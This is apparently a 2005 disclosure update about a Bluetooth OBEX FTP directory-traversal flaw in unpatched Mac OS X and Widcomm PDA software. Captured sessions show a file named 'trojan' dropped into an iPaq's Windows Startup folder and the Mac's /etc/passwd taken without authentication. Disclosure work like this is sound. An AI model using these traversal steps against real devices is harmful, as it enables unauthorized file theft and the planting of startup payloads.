Bluetooth dot dot attacks (update)
in DMA[2005-0502a] I stated that "...I can not confirm nor deny that files can
be placed or retrieved via OBEX FTP and
the ../../ method. I have only been able to list files using my current obex
client (Against Mac OSX).
With a modified version of btftp from Affix-3.2.0 I am now able to confirm that
an attacker also has the ability to both
grab and put files outside of the default drop path when using OBEX ftp.
Zero authentication is required on OSX if an unpatched machine is being used.
I can also now state that Widcomm software on PDA's are also affected. This is
NOT the same as my object push ../
vulnerability. This Widcomm bug is yet another bug that has not been disclosed
in the past. Some PDA's require
authentication for OBEX ftp ... some do not.
Here is an example attack against my HP Ipaq 2215
animosity:/usr/src/affix-3.2.0# btftp
Affix version: Affix 3.2.0
Welcome to btftp (OBEX) tool. Type ? for help.
Mode: Bluetooth
ftp> open 00:04:3e:65:a1:c8
Service found on channel: 3
Connected.
ftp> ls
-rwdx 634 eyiot447.pwi
drwdx 0 Business
drwdx 0 Personal
drwdx 0 Templates
Command complete.
ftp> cd ../
Command complete.
ftp> ls
drwdx 0 ..
Command complete.
ftp> cd Windows
Command complete.
ftp> cd Startup
Command complete.
ftp> put /etc/hosts trojan
Transfer started...
Transfer complete.
257 bytes sent in 0.5 secs (5140.00 B/s)
ftp> ls trojan
Browsing error: OBEX error: Internal server error (0x50)
ftp>
If I go to the iPaq and browse the folder in question the file is sitting right
where I placed it.
Here is an example attack against my Apple OSX machine this shows me grabbing
/etc/passwd
animosity:/usr/src/affix-3.2.0# btftp
Affix version: Affix 3.2.0
Welcome to btftp (OBEX) tool. Type ? for help.
Mode: Bluetooth
ftp> open 00:11:95:4f:60:1f
Service found on channel: 15
Connected.
ftp> ls
d---- 0 Faxes
d---- 0 New Folder
d---- 0 SC Info
Command complete.
ftp> cd ../
Command complete.
ftp> ls
d---- 0 ..
----- 195662 4D WebSTAR Installer.log
d---- 0 johnh
d---- 0 kevinfinisterre
d---- 0 Shared
d---- 0 webstar
Command complete.
ftp> cd ../
Command complete.
ftp> ls
d---- 0 ..
d---- 0 Applications
d---- 0 automount
d---- 0 bin
d---- 0 cores
----- 3584 Desktop DB
----- 4482 Desktop DF
d---- 0 dev
d---- 0 Developer
----- 11 etc
d---- 0 File Transfer Folder
d---- 0 Library
----- 9 mach
----- 571184 mach.sym
----- 3872560 mach_kernel
d---- 0 Network
d---- 0 private
d---- 0 sbin
d---- 0 System
----- 11 tmp
d---- 0 Users
d---- 0 usr
----- 11 var
d---- 0 Volumes
Command complete.
ftp> cd etc
Command complete.
ftp> ls
d---- 0 ..
----- 753 6to4.conf
----- 515 afpovertcp.cfg
----- 15 aliases
----- 16384 aliases.db
----- 1046 amd.conf.template
----- 112 amd.map.template
d---- 0 auth
----- 14761 authorization
----- 16541 authorization.cac
----- 160 bashrc
d---- 0 charset
----- 295 crontab
----- 189 csh.cshrc
----- 83 csh.login
----- 39 csh.logout
d---- 0 cups
----- 24 daily
d---- 0 defaults
----- 0 dumpdates
----- 695 efax.rc
----- 0 find.codes
d---- 0 fonts
----- 293 fstab
----- 150 fstab.hd
----- 119 ftpusers
----- 576 gdb.conf
----- 5678 gettytab
----- 699 group
----- 491 hostconfig
----- 492 hostconfig~
----- 0 hosts.equiv
----- 0 hosts.lpd
d---- 0 httpd
d---- 0 idmap
----- 2893 inetd.conf
----- 12 kcpassword
----- 0 kern_loader.conf
----- 30 localtime
----- 131072 lowcase.dat
d---- 0 mach_init.d
d---- 0 mach_init_per_user.d
----- 105 mail.rc
----- 891 manpath.config
----- 1259 master.passwd
----- 88039 moduli
----- 28 monthly
----- 19 motd
----- 905 named.conf
----- 53 networks
----- 132 notify.conf
----- 44 ntp.conf
d---- 0 openldap
d---- 0 pam.d
----- 1374 passwd
d---- 0 pdb
d---- 0 periodic
----- 38693 php.ini.default
d---- 0 postfix
d---- 0 ppp
----- 125 profile
----- 5766 protocols
d---- 0 racoon
----- 8099 rc
----- 3572 rc.boot
----- 4178 rc.cleanup
----- 2356 rc.common
----- 4763 rc.netboot
----- 20 resolv.conf
d---- 0 resolver
----- 13 rmt
----- 0 rmtab
----- 971 rpc
----- 983 rtadvd.conf
----- 572576 services
----- 170 shells
----- 52 slpsa.conf
----- 1732 smb.conf
----- 1144 ssh_config
----- 668 ssh_host_dsa_key
----- 590 ssh_host_dsa_key.pub
----- 515 ssh_host_key
----- 319 ssh_host_key.pub
----- 883 ssh_host_rsa_key
----- 210 ssh_host_rsa_key.pub
----- 2409 sshd_config
----- 361 sudoers
----- 798 syslog.conf
----- 2442 ttys
----- 131072 upcase.dat
----- 65536 valid.dat
d---- 0 vfs
----- 26 weekly
----- 238 xinetd.conf
d---- 0 xinetd.d
----- 0 xtab
Command complete.
ftp> get passwd
Transfer started...
Transfer complete.
268564544 bytes received in 0.34 secs (789895717.65 B/s)
animosity:/usr/local/bin# cat passwd
##
# User Database
#
# Note that this file is consulted when the system is running in single-user
# mode. At other times this information is handled by one or more of:
# lookupd DirectoryServices
# By default, lookupd gets information from NetInfo, so this file will
# not be consulted unless you have changed lookupd's configuration.
# This file is used while in single user mode.
#
# To use this file for normal authentication, you may enable it with
# /Applications/Utilities/Directory Access.
##
nobody:*:-2:-2:Unprivileged User:/:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
smmsp:*:25:25:Sendmail User:/private/etc/mail:/usr/bin/false
lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false
postfix:*:27:27:Postfix User:/var/spool/postfix:/usr/bin/false
www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false
eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false
mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false
sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false
cyrus:*:77:6:Cyrus User:/var/imap:/usr/bin/false
mailman:*:78:78:Mailman user:/var/empty:/usr/bin/false
appserver:*:79:79:Application Server:/var/empty:/usr/bin/false
unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
This shows me placing a file in /tmp
Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:11:95:4f:60:1f
Connected.
ftp> ls
d---- 0 Faxes
d---- 0 New Folder
d---- 0 SC Info
Command complete.
ftp> cd ../
Command complete.
ftp> cd ../
Command complete.
ftp> cd tmp
Command complete.
ftp> ls
d---- 0 ..
Command complete.
ftp> put /etc/hosts hosts
Transfer started...
Transfer complete.
257 bytes sent in 0.10 secs (2570.00 B/s)
ftp> ls
d---- 0 ..
d---- 0 501
----- 257 hosts
Command complete.
Keep in mind that you are using the permissions of the currently logged in user
so you may not have access to
everything.
It seems pretty trivial to turn these issues into a worm or some other form of
automated attack.
Please apply your Apple updates and turn off that Widcomm stuff if you aren't
using it! Do NOT accept requests
from unknown bluetooth sources.
enjoy.
-KF